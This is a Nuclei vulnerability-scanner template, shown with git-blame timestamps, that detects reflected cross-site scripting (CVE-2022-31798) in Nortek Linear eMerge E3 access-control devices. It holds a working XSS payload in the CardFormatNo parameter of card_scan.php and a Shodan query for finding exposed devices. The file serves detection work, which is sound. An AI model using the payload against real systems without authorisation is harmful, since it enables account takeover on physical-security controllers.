nuclei-templates/cves/2022/CVE-2022-31798.yaml

43 lines
1.2 KiB
YAML
Raw Normal View History

2022-08-12 11:31:04 +00:00
id: CVE-2022-31798
info:
name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
2022-08-12 11:31:04 +00:00
author: ritikchaddha
severity: medium
2022-08-12 11:31:04 +00:00
description: |
There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
reference:
- https://packetstormsecurity.com/files/167992/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31798
cwe-id: CWE-79
2022-08-12 11:31:04 +00:00
metadata:
shodan-query: http.title:"eMerge"
verified: "true"
tags: cve2022,emerge,nortek,xss,packetstorm,cve
2022-08-12 11:31:04 +00:00
requests:
- method: GET
path:
2022-08-13 00:01:54 +00:00
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
2022-08-12 11:31:04 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-13 00:01:54 +00:00
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
2022-08-12 11:31:04 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200